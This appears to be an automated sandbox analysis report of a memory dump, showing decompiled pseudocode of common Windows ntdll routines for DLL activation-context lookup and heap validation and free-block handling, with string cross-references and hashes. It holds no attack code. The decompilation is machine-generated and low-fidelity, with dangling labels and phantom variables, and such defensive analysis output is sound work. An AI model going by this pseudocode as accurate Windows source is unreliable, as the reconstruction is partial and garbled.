                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00AF8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xbbd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xbb8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xbb5780 & 0x00000003) != 0) {
							E00B45510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xbb5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00B0B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xbb7984; // 0x672b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xbb8464; // 0x74b10110
					 *0xbbb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00AF9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xbb5780 & 0x00000005) != 0) {
						_push(_t49);
						E00B45510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                        0x00af8e0f
                                                                                                        0x00af8e16
                                                                                                        0x00af8e19
                                                                                                        0x00af8e1b
                                                                                                        0x00af8e21
                                                                                                        0x00af8e7f
                                                                                                        0x00af8e85
                                                                                                        0x00b39354
                                                                                                        0x00b3936c
                                                                                                        0x00b39371
                                                                                                        0x00b3937b
                                                                                                        0x00b39381
                                                                                                        0x00b39381
                                                                                                        0x00b3937b
                                                                                                        0x00af8e9d
                                                                                                        0x00af8e9d
                                                                                                        0x00af8e29
                                                                                                        0x00af8e2c
                                                                                                        0x00af8e38
                                                                                                        0x00af8e3e
                                                                                                        0x00af8e43
                                                                                                        0x00af8eb5
                                                                                                        0x00af8eb9
                                                                                                        0x00b392aa
                                                                                                        0x00b392af
                                                                                                        0x00b392e8
                                                                                                        0x00b392e8
                                                                                                        0x00b392af
                                                                                                        0x00af8eb9
                                                                                                        0x00af8e45
                                                                                                        0x00af8e53
                                                                                                        0x00af8e5b
                                                                                                        0x00af8e5f
                                                                                                        0x00af8e78
                                                                                                        0x00af8e78
                                                                                                        0x00af8e7d
                                                                                                        0x00af8ec3
                                                                                                        0x00af8ecd
                                                                                                        0x00af8ed2
                                                                                                        0x00af8ed2
                                                                                                        0x00af8ec5
                                                                                                        0x00af8ec5
                                                                                                        0x00000000
                                                                                                        0x00af8e7d
                                                                                                        0x00af8e67
                                                                                                        0x00af8ea4
                                                                                                        0x00b3931a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b39320
                                                                                                        0x00af8ea4
                                                                                                        0x00af8e70
                                                                                                        0x00b39325
                                                                                                        0x00b39340
                                                                                                        0x00b39345
                                                                                                        0x00b39345
                                                                                                        0x00af8e76
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        • LdrpFindDllActivationContext, xrefs: 00B39331, 00B3935D
                                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 00B3933B, 00B39367
                                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 00B39357
                                                                                                        • +g, xrefs: 00AF8E2C
                                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00B3932A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: +g$LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                        • API String ID: 0-3840699197
                                                                                                        • Opcode ID: e5738008f0f3ecf64e6efd2fad8aebd099899dd5d13e26f5e4f46f16c29c30d7
                                                                                                        • Instruction ID: b033561f82952b4c839ff781ce1255a3079a3c1eabcb47384f6fdff15bdfa4f9
                                                                                                        • Opcode Fuzzy Hash: e5738008f0f3ecf64e6efd2fad8aebd099899dd5d13e26f5e4f46f16c29c30d7
                                                                                                        • Instruction Fuzzy Hash: D1414632A0031DAFCB35AB88CC8DB7AB6B4BB11744F094569FA04571A1EFB8DC80C281
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AC40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 29%
                                                                                                        			E00AC40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00ACB150();
					} else {
						E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00ACB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00ACB150(", passed to %s", _t29);
					}
					_push("\n");
					E00ACB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xbb6378 = 1;
						asm("int3");
						 *0xbb6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                        0x00ac40e6
                                                                                                        0x00ac40e8
                                                                                                        0x00ac40f1
                                                                                                        0x00b2042d
                                                                                                        0x00b2044c
                                                                                                        0x00b20451
                                                                                                        0x00b2042f
                                                                                                        0x00b20444
                                                                                                        0x00b20449
                                                                                                        0x00b2045d
                                                                                                        0x00b20466
                                                                                                        0x00b2046e
                                                                                                        0x00b20474
                                                                                                        0x00b20475
                                                                                                        0x00b2047a
                                                                                                        0x00b2048a
                                                                                                        0x00b2048c
                                                                                                        0x00b20493
                                                                                                        0x00b20494
                                                                                                        0x00b20494
                                                                                                        0x00000000
                                                                                                        0x00b2049b
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                        • API String ID: 0-188067316
                                                                                                        • Opcode ID: 06335870b462394ea7227114bc50eda4f66a85ead951d38164214baf4e63c0ed
                                                                                                        • Instruction ID: 7b673a27e972109a0a9b6d0c03926b8ae740e41b56bf2460789961ccb8727b14
                                                                                                        • Opcode Fuzzy Hash: 06335870b462394ea7227114bc50eda4f66a85ead951d38164214baf4e63c0ed
                                                                                                        • Instruction Fuzzy Hash: A5012D32161250AED219F764A55FF5177F8EB01B30F1D845DF119477C2CBA95844C634
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AEA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E00AEA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0xbb8748 - 1;
					if( *0xbb8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E00ACB150();
									_t260 = _t257 + 4;
								} else {
									E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E00ACB150();
								_t257 = _t260 + 4;
								__eflags =  *0xbb7bc8;
								if(__eflags == 0) {
									E00B82073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E00B8A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E00B1D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E00AEAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E00B8A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E00B8A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0xbb8748 - 1;
					if( *0xbb8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E00ACB150();
							} else {
								E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E00ACB150();
							__eflags =  *0xbb7bc8;
							if(__eflags == 0) {
								_t131 = E00B82073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                                                        0x00aea83a
                                                                                                        0x00aea83c
                                                                                                        0x00aea83e
                                                                                                        0x00aea841
                                                                                                        0x00aea844
                                                                                                        0x00aea84a
                                                                                                        0x00aeaa53
                                                                                                        0x00aeaa59
                                                                                                        0x00aeaa59
                                                                                                        0x00aea858
                                                                                                        0x00aea85e
                                                                                                        0x00aeaaf5
                                                                                                        0x00aeaafc
                                                                                                        0x00b3229e
                                                                                                        0x00b322a2
                                                                                                        0x00b322a8
                                                                                                        0x00b322b3
                                                                                                        0x00b322b5
                                                                                                        0x00b322bb
                                                                                                        0x00b322c1
                                                                                                        0x00b322c5
                                                                                                        0x00b322e6
                                                                                                        0x00b322eb
                                                                                                        0x00b322f0
                                                                                                        0x00b322c7
                                                                                                        0x00b322dc
                                                                                                        0x00b322e1
                                                                                                        0x00b322e1
                                                                                                        0x00b322f3
                                                                                                        0x00b322f8
                                                                                                        0x00b322fd
                                                                                                        0x00b32300
                                                                                                        0x00b32307
                                                                                                        0x00b3230e
                                                                                                        0x00b3230e
                                                                                                        0x00b32313
                                                                                                        0x00b32313
                                                                                                        0x00b322b5
                                                                                                        0x00b322a2
                                                                                                        0x00aeaafc
                                                                                                        0x00aea864
                                                                                                        0x00aea869
                                                                                                        0x00aeaa5c
                                                                                                        0x00aeaa5e
                                                                                                        0x00aea86f
                                                                                                        0x00aea87f
                                                                                                        0x00aea885
                                                                                                        0x00aea885
                                                                                                        0x00aea88b
                                                                                                        0x00aea890
                                                                                                        0x00aea896
                                                                                                        0x00aeab0c
                                                                                                        0x00aeab0f
                                                                                                        0x00aeab15
                                                                                                        0x00b32320
                                                                                                        0x00b32320
                                                                                                        0x00aeab1b
                                                                                                        0x00aea89c
                                                                                                        0x00aea89f
                                                                                                        0x00aea8a2
                                                                                                        0x00aea8a2
                                                                                                        0x00aea8a5
                                                                                                        0x00aea8af
                                                                                                        0x00aea8b3
                                                                                                        0x00aea8b8
                                                                                                        0x00aeaa66
                                                                                                        0x00aea8be
                                                                                                        0x00aea8c5
                                                                                                        0x00aea8c6
                                                                                                        0x00aea8ce
                                                                                                        0x00b32328
                                                                                                        0x00b32332
                                                                                                        0x00b32337
                                                                                                        0x00b32337
                                                                                                        0x00aea8ce
                                                                                                        0x00aea8d4
                                                                                                        0x00aea8d8
                                                                                                        0x00aea8db
                                                                                                        0x00aea8de
                                                                                                        0x00aea8e1
                                                                                                        0x00aea8e5
                                                                                                        0x00aea8e8
                                                                                                        0x00aea8f0
                                                                                                        0x00aea8f3
                                                                                                        0x00b3234c
                                                                                                        0x00b32350
                                                                                                        0x00b32355
                                                                                                        0x00b32359
                                                                                                        0x00b32359
                                                                                                        0x00aea8f9
                                                                                                        0x00aea901
                                                                                                        0x00aeaae4
                                                                                                        0x00aeaae4
                                                                                                        0x00aeaaea
                                                                                                        0x00000000
                                                                                                        0x00aea907
                                                                                                        0x00aea90a
                                                                                                        0x00aea91d
                                                                                                        0x00aea91d
                                                                                                        0x00000000
                                                                                                        0x00aea910
                                                                                                        0x00aea910
                                                                                                        0x00aea910
                                                                                                        0x00aea914
                                                                                                        0x00aea924
                                                                                                        0x00aea924
                                                                                                        0x00aea924
                                                                                                        0x00aea924
                                                                                                        0x00aea916
                                                                                                        0x00aea91b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aea91b
                                                                                                        0x00aea925
                                                                                                        0x00aea925
                                                                                                        0x00aea932
                                                                                                        0x00aea936
                                                                                                        0x00aea93c
                                                                                                        0x00aea93c
                                                                                                        0x00aea93c
                                                                                                        0x00aeab22
                                                                                                        0x00aeab24
                                                                                                        0x00aeab27
                                                                                                        0x00aeab27
                                                                                                        0x00aea942
                                                                                                        0x00aea944
                                                                                                        0x00aeaaba
                                                                                                        0x00aeaabd
                                                                                                        0x00aeaac0
                                                                                                        0x00aeaac0
                                                                                                        0x00aeaac2
                                                                                                        0x00aeab2f
                                                                                                        0x00aeaac4
                                                                                                        0x00aeaac4
                                                                                                        0x00aeaac7
                                                                                                        0x00aeaaca
                                                                                                        0x00aeaacc
                                                                                                        0x00aeaace
                                                                                                        0x00aeaace
                                                                                                        0x00aeaace
                                                                                                        0x00aeaad1
                                                                                                        0x00aeaad1
                                                                                                        0x00aeaad7
                                                                                                        0x00aeaad9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b32361
                                                                                                        0x00b32369
                                                                                                        0x00b3236b
                                                                                                        0x00000000
                                                                                                        0x00b32371
                                                                                                        0x00000000
                                                                                                        0x00b32371
                                                                                                        0x00000000
                                                                                                        0x00b3236b
                                                                                                        0x00aeaac0
                                                                                                        0x00aea94a
                                                                                                        0x00aea94a
                                                                                                        0x00aea94d
                                                                                                        0x00aea94d
                                                                                                        0x00aea950
                                                                                                        0x00aea954
                                                                                                        0x00b32376
                                                                                                        0x00b32380
                                                                                                        0x00aea95a
                                                                                                        0x00aea95a
                                                                                                        0x00aea95c
                                                                                                        0x00aea95f
                                                                                                        0x00aea961
                                                                                                        0x00aea961
                                                                                                        0x00aea967
                                                                                                        0x00aea96a
                                                                                                        0x00aea972
                                                                                                        0x00aeaa02
                                                                                                        0x00aeaa06
                                                                                                        0x00aeaa10
                                                                                                        0x00aeaa16
                                                                                                        0x00aeaa16
                                                                                                        0x00aeaa1b
                                                                                                        0x00aeaa21
                                                                                                        0x00aeaa24
                                                                                                        0x00aeaa27
                                                                                                        0x00aeaa29
                                                                                                        0x00aeaa2c
                                                                                                        0x00aeaa32
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aea978
                                                                                                        0x00aea978
                                                                                                        0x00aea97b
                                                                                                        0x00aea981
                                                                                                        0x00aea996
                                                                                                        0x00aea998
                                                                                                        0x00aea99f
                                                                                                        0x00aea9a2
                                                                                                        0x00b3238a
                                                                                                        0x00aea9a8
                                                                                                        0x00aea9a8
                                                                                                        0x00aea9a8
                                                                                                        0x00aea9aa
                                                                                                        0x00aea9ad
                                                                                                        0x00aea9b0
                                                                                                        0x00aea9bb
                                                                                                        0x00aea9be
                                                                                                        0x00aea9c7
                                                                                                        0x00aea9c9
                                                                                                        0x00aea9c9
                                                                                                        0x00aea9cc
                                                                                                        0x00aea9d1
                                                                                                        0x00aeaa6d
                                                                                                        0x00aeaa70
                                                                                                        0x00aeaa73
                                                                                                        0x00aeaa75
                                                                                                        0x00aeaa79
                                                                                                        0x00aeaa7e
                                                                                                        0x00aeaa82
                                                                                                        0x00aeaa8f
                                                                                                        0x00aeaa94
                                                                                                        0x00aeaa96
                                                                                                        0x00b32392
                                                                                                        0x00b323a1
                                                                                                        0x00b323a1
                                                                                                        0x00aeaa9c
                                                                                                        0x00aeaa9f
                                                                                                        0x00aeaaa2
                                                                                                        0x00aeaaa2
                                                                                                        0x00aeaaa8
                                                                                                        0x00aeaaab
                                                                                                        0x00aeaaaf
                                                                                                        0x00000000
                                                                                                        0x00aeaab5
                                                                                                        0x00000000
                                                                                                        0x00aeaab5
                                                                                                        0x00aea9d7
                                                                                                        0x00aea9d7
                                                                                                        0x00aea9da
                                                                                                        0x00aea9e0
                                                                                                        0x00aea9e3
                                                                                                        0x00aea9e6
                                                                                                        0x00aea9e9
                                                                                                        0x00aea9eb
                                                                                                        0x00aea9fd
                                                                                                        0x00aea9fd
                                                                                                        0x00000000
                                                                                                        0x00aea9eb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aea983
                                                                                                        0x00aea983
                                                                                                        0x00aea983
                                                                                                        0x00aea987
                                                                                                        0x00aea995
                                                                                                        0x00aea995
                                                                                                        0x00aea995
                                                                                                        0x00aea995
                                                                                                        0x00aea989
                                                                                                        0x00aea98e
                                                                                                        0x00000000
                                                                                                        0x00aea990
                                                                                                        0x00000000
                                                                                                        0x00aea990
                                                                                                        0x00aea98e
                                                                                                        0x00000000
                                                                                                        0x00aea983
                                                                                                        0x00aea972
                                                                                                        0x00aea90a
                                                                                                        0x00aeaa34
                                                                                                        0x00aeaa34
                                                                                                        0x00aeaa40
                                                                                                        0x00aeaa43
                                                                                                        0x00aeaa46
                                                                                                        0x00aeaa4d
                                                                                                        0x00b323ab
                                                                                                        0x00b323b2
                                                                                                        0x00b323b8
                                                                                                        0x00b323be
                                                                                                        0x00b323c3
                                                                                                        0x00b323c5
                                                                                                        0x00b323cb
                                                                                                        0x00b323d1
                                                                                                        0x00b323d5
                                                                                                        0x00b323f6
                                                                                                        0x00b323fb
                                                                                                        0x00b323d7
                                                                                                        0x00b323ec
                                                                                                        0x00b323f1
                                                                                                        0x00b32403
                                                                                                        0x00b32408
                                                                                                        0x00b32410
                                                                                                        0x00b32417
                                                                                                        0x00b32422
                                                                                                        0x00b32422
                                                                                                        0x00b32417
                                                                                                        0x00b323c5
                                                                                                        0x00b323b2
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        • HEAP[%wZ]: , xrefs: 00B322D7, 00B323E7
                                                                                                        • HEAP: , xrefs: 00B322E6, 00B323F6
                                                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00B32403
                                                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00B322F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                        • API String ID: 0-1657114761
                                                                                                        • Opcode ID: 7a37cadf6ce5609c3eabf22faaec0a55c2006657fa1fee71aff5be7683edff26
                                                                                                        • Instruction ID: 3c22ed715a3c627c48c7e55a82c9d784e0ff65eca30312317d71025dc2d7db99
                                                                                                        • Opcode Fuzzy Hash: 7a37cadf6ce5609c3eabf22faaec0a55c2006657fa1fee71aff5be7683edff26
                                                                                                        • Instruction Fuzzy Hash: A7D1D170A002859FDB18CF69C590BBAB7F1FF68300F258569D85A9B342E734BC45CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AEA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                        Download Yara Rule
